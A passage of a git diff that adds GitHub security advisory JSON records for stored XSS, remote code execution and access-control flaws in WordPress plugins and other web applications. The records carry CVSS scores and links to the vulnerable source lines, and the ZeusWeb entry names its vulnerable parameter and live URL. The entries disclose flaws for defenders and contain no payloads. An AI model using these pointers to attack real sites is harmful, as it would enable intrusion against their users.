"https://access.redhat.com/errata/RHSA-2026:2182" + "url": "https://access.redhat.com/errata/RHSA-2026:2396" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2214" + "url": "https://access.redhat.com/errata/RHSA-2026:2216" }, { "type": "WEB", @@ -57,27 +57,35 @@ }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2216" + "url": "https://access.redhat.com/errata/RHSA-2026:2214" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2396" + "url": "https://access.redhat.com/errata/RHSA-2026:2182" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2402" + "url": "https://access.redhat.com/errata/RHSA-2026:2049" }, { "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2026-0719" + "url": "https://access.redhat.com/errata/RHSA-2026:2008" }, { "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427906" + "url": "https://access.redhat.com/errata/RHSA-2026:2007" }, { "type": "WEB", - "url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/477" + "url": "https://access.redhat.com/errata/RHSA-2026:2006" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2005" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:1948" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-27g4-m3jv-cgvm/GHSA-27g4-m3jv-cgvm.json b/advisories/unreviewed/2026/02/GHSA-27g4-m3jv-cgvm/GHSA-27g4-m3jv-cgvm.json new file mode 100644 index 0000000000000..c0654628c2947 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-27g4-m3jv-cgvm/GHSA-27g4-m3jv-cgvm.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27g4-m3jv-cgvm", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-15440" + ], + "details": "The iONE360 configurator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Contact Form Parameters in all versions up to, and including, 2.0.57 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15440" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L50" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L53" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L59" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L60" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L63" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L66" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ione360-configurator/tags/2.0.57/admin/partials/configurator-ione360-admin-contact-form.php#L69" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02fe87e4-4275-4652-aec1-b25547071796?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3h85-7292-2f8x/GHSA-3h85-7292-2f8x.json b/advisories/unreviewed/2026/02/GHSA-3h85-7292-2f8x/GHSA-3h85-7292-2f8x.json new file mode 100644 index 0000000000000..282d566ff5dd7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3h85-7292-2f8x/GHSA-3h85-7292-2f8x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3h85-7292-2f8x", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1560" + ], + "details": "The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.0 via multiple functions in the 'LazyBlocks_Blocks' class. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1560" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/lazy-blocks/trunk/classes/class-blocks.php#L1637" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/lazy-blocks/trunk/classes/class-blocks.php#L766" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/lazy-blocks/trunk/classes/class-rest.php#L88" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3454012" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b1853c88-277b-4955-b042-aeed1cffb49b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4m3p-4qg3-gvrj/GHSA-4m3p-4qg3-gvrj.json b/advisories/unreviewed/2026/02/GHSA-4m3p-4qg3-gvrj/GHSA-4m3p-4qg3-gvrj.json new file mode 100644 index 0000000000000..f343c008044e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4m3p-4qg3-gvrj/GHSA-4m3p-4qg3-gvrj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4m3p-4qg3-gvrj", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1885" + ], + "details": "The Slideshow Wp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sswpid' attribute of the 'sswp-slide' shortcode in all versions up to, and including, 1.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1885" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/slideshow-wp/tags/1.1/includes/sswp-functions.php#L102" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/slideshow-wp/trunk/includes/sswp-functions.php#L102" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c0827fd-05e6-48bb-9592-bcc373d5f77d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4qr9-h3h9-fwcc/GHSA-4qr9-h3h9-fwcc.json b/advisories/unreviewed/2026/02/GHSA-4qr9-h3h9-fwcc/GHSA-4qr9-h3h9-fwcc.json new file mode 100644 index 0000000000000..e41285723159c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4qr9-h3h9-fwcc/GHSA-4qr9-h3h9-fwcc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qr9-h3h9-fwcc", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1853" + ], + "details": "The BuddyHolis ListSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'listsearch' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1853" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/listsearch/tags/1.1/listsearch.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/listsearch/trunk/listsearch.php#L33" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/listsearch" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43e52adf-387c-452d-96b4-aad459fa75b3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-675f-2vc9-8xg6/GHSA-675f-2vc9-8xg6.json b/advisories/unreviewed/2026/02/GHSA-675f-2vc9-8xg6/GHSA-675f-2vc9-8xg6.json new file mode 100644 index 0000000000000..0dbf5c7a7ed1f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-675f-2vc9-8xg6/GHSA-675f-2vc9-8xg6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-675f-2vc9-8xg6", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-13649" + ], + "details": "An attacker with access to the web application ZeusWeb of the provider Microcom\n\n (in this case, registration is not necessary, but the action must be performed) who has the vulnerable software could introduce arbitrary JavaScript by injecting an XSS payload into the ‘Email’ parameters within the ‘Recover password’ section at the URL: https://zeus.microcom.es:4040/index.html?zeus6=true . This issue affects ZeusWeb: 6.1.31.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13649" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-CVE-2025-13649" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-HRTU-0001" + }, + { + "type": "WEB", + "url": "https://www.microcom360.com/servicio-zeus-web" + }, + { + "type": "WEB", + "url": "https://zeus.microcom.es:4040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json index 307c6c4c226d1..48ffd8648737c 100644 --- a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json +++ b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6j8r-j98h-9g9f", - "modified": "2026-02-10T15:30:21Z", + "modified": "2026-02-11T09:30:17Z", "published": "2026-02-02T15:30:34Z", "aliases": [ "CVE-2026-1761" @@ -21,35 +21,35 @@ }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:1948" + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435961" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2005" + "url": "https://access.redhat.com/security/cve/CVE-2026-1761" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2006" + "url": "https://access.redhat.com/errata/RHSA-2026:2514" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2007" + "url": "https://access.redhat.com/errata/RHSA-2026:2512" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2008" + "url": "https://access.redhat.com/errata/RHSA-2026:2410" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2049" + "url": "https://access.redhat.com/errata/RHSA-2026:2402" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2182" + "url": "https://access.redhat.com/errata/RHSA-2026:2396" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2214" + "url": "https://access.redhat.com/errata/RHSA-2026:2216" }, { "type": "WEB", @@ -57,27 +57,35 @@ }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2216" + "url": "https://access.redhat.com/errata/RHSA-2026:2214" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2396" + "url": "https://access.redhat.com/errata/RHSA-2026:2182" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2402" + "url": "https://access.redhat.com/errata/RHSA-2026:2049" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2410" + "url": "https://access.redhat.com/errata/RHSA-2026:2008" }, { "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2026-1761" + "url": "https://access.redhat.com/errata/RHSA-2026:2007" }, { "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435961" + "url": "https://access.redhat.com/errata/RHSA-2026:2006" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2005" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:1948" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-72cf-r449-9974/GHSA-72cf-r449-9974.json b/advisories/unreviewed/2026/02/GHSA-72cf-r449-9974/GHSA-72cf-r449-9974.json new file mode 100644 index 0000000000000..1f4aad574a783 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-72cf-r449-9974/GHSA-72cf-r449-9974.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-72cf-r449-9974", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1809" + ], + "details": "The HTML Tag Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1809" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/html-shortcodes/tags/1.1/html_shortcode.php#L100" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/html-shortcodes/tags/1.1/html_shortcode.php#L88" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/html-shortcodes/trunk/html_shortcode.php#L100" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/html-shortcodes/trunk/html_shortcode.php#L88" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/846ccac2-ad56-4128-836d-2807c700c3fc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9598-vp7g-3348/GHSA-9598-vp7g-3348.json b/advisories/unreviewed/2026/02/GHSA-9598-vp7g-3348/GHSA-9598-vp7g-3348.json new file mode 100644 index 0000000000000..a399b28609cfd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9598-vp7g-3348/GHSA-9598-vp7g-3348.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9598-vp7g-3348", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-13651" + ], + "details": "Exposure of Sensitive System Information to an Unauthorized Actor vulnerability in Microcom ZeusWeb allows Web Application Fingerprinting of sensitive data. This issue affects ZeusWeb: 6.1.31.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13651" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-CVE-2025-13651" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-HRTU-0001" + }, + { + "type": "WEB", + "url": "https://www.microcom360.com/servicio-zeus-web" + }, + { + "type": "WEB", + "url": "https://zeus.microcom.es:4040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9c75-pvwv-54wj/GHSA-9c75-pvwv-54wj.json b/advisories/unreviewed/2026/02/GHSA-9c75-pvwv-54wj/GHSA-9c75-pvwv-54wj.json new file mode 100644 index 0000000000000..d106e4124d60d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9c75-pvwv-54wj/GHSA-9c75-pvwv-54wj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c75-pvwv-54wj", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1827" + ], + "details": "The Flask Micro code-editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's codeflask shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1827" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/flask-micro/tags/1.0.0/flask_micro.php#L80" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/flask-micro/trunk/flask_micro.php#L80" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fc1ef15f-ad31-4525-bbe5-bc3cc4485b20?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c224-wx4m-6qf6/GHSA-c224-wx4m-6qf6.json b/advisories/unreviewed/2026/02/GHSA-c224-wx4m-6qf6/GHSA-c224-wx4m-6qf6.json new file mode 100644 index 0000000000000..78e345e8b9273 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c224-wx4m-6qf6/GHSA-c224-wx4m-6qf6.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c224-wx4m-6qf6", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1821" + ], + "details": "The Microtango plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'restkey' parameter of the mt_reservation shortcode in all versions up to, and including, 0.9.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1821" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/microtango/tags/0.9.29/microtango-init.php#L129" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/microtango/trunk/microtango-init.php#L129" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/27657d29-e834-4f05-8fe9-7db0ab96f67d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h64q-7h2c-3jw5/GHSA-h64q-7h2c-3jw5.json b/advisories/unreviewed/2026/02/GHSA-h64q-7h2c-3jw5/GHSA-h64q-7h2c-3jw5.json new file mode 100644 index 0000000000000..f8948f4ab6f56 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h64q-7h2c-3jw5/GHSA-h64q-7h2c-3jw5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h64q-7h2c-3jw5", + "modified": "2026-02-11T09:30:17Z", + "published": "2026-02-11T09:30:17Z", + "aliases": [ + "CVE-2025-10913" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Saastech Cleaning and Internet Services Inc. TemizlikYolda allows Cross-Site Scripting (XSS).This issue affects TemizlikYolda: through 11022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10913" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0055" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T08:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hxcf-rpfm-c25q/GHSA-hxcf-rpfm-c25q.json b/advisories/unreviewed/2026/02/GHSA-hxcf-rpfm-c25q/GHSA-hxcf-rpfm-c25q.json new file mode 100644 index 0000000000000..7e974860ecf9a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hxcf-rpfm-c25q/GHSA-hxcf-rpfm-c25q.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hxcf-rpfm-c25q", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1826" + ], + "details": "The OpenPOS Lite – Point of Sale for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter of the order_qrcode shortcode in all versions up to, and including, 3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1826" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpos-lite-version/tags/3.0/includes/admin/Admin.php#L3161" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpos-lite-version/trunk/includes/admin/Admin.php#L3161" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3bb88e9-e410-4ff7-b342-72c7b375dff1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j4hm-cc75-4f7j/GHSA-j4hm-cc75-4f7j.json b/advisories/unreviewed/2026/02/GHSA-j4hm-cc75-4f7j/GHSA-j4hm-cc75-4f7j.json new file mode 100644 index 0000000000000..ce64787fb6e15 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j4hm-cc75-4f7j/GHSA-j4hm-cc75-4f7j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j4hm-cc75-4f7j", + "modified": "2026-02-11T09:30:17Z", + "published": "2026-02-11T09:30:17Z", + "aliases": [ + "CVE-2025-10912" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Saastech Cleaning and Internet Services Inc. TemizlikYolda allows Manipulating User-Controlled Variables.This issue affects TemizlikYolda: through 11022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10912" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0055" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T08:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mpvf-vrx7-h74x/GHSA-mpvf-vrx7-h74x.json b/advisories/unreviewed/2026/02/GHSA-mpvf-vrx7-h74x/GHSA-mpvf-vrx7-h74x.json new file mode 100644 index 0000000000000..81bb4ab27adcc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mpvf-vrx7-h74x/GHSA-mpvf-vrx7-h74x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mpvf-vrx7-h74x", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1786" + ], + "details": "The Twitter posts to Blog plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'dg_tw_options' function in all versions up to, and including, 1.11.25. This makes it possible for unauthenticated attackers to update plugin settings including Twitter API credentials, post author, post status, and the capability required to access the plugin's admin menu.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1786" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/twitter-posts-to-blog/trunk/functions.php#L426" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/abcbb84c-6c2d-40c1-8c64-7d4866fa9503?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mw6j-4x6g-77v3/GHSA-mw6j-4x6g-77v3.json b/advisories/unreviewed/2026/02/GHSA-mw6j-4x6g-77v3/GHSA-mw6j-4x6g-77v3.json new file mode 100644 index 0000000000000..f412155e5ae84 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mw6j-4x6g-77v3/GHSA-mw6j-4x6g-77v3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": 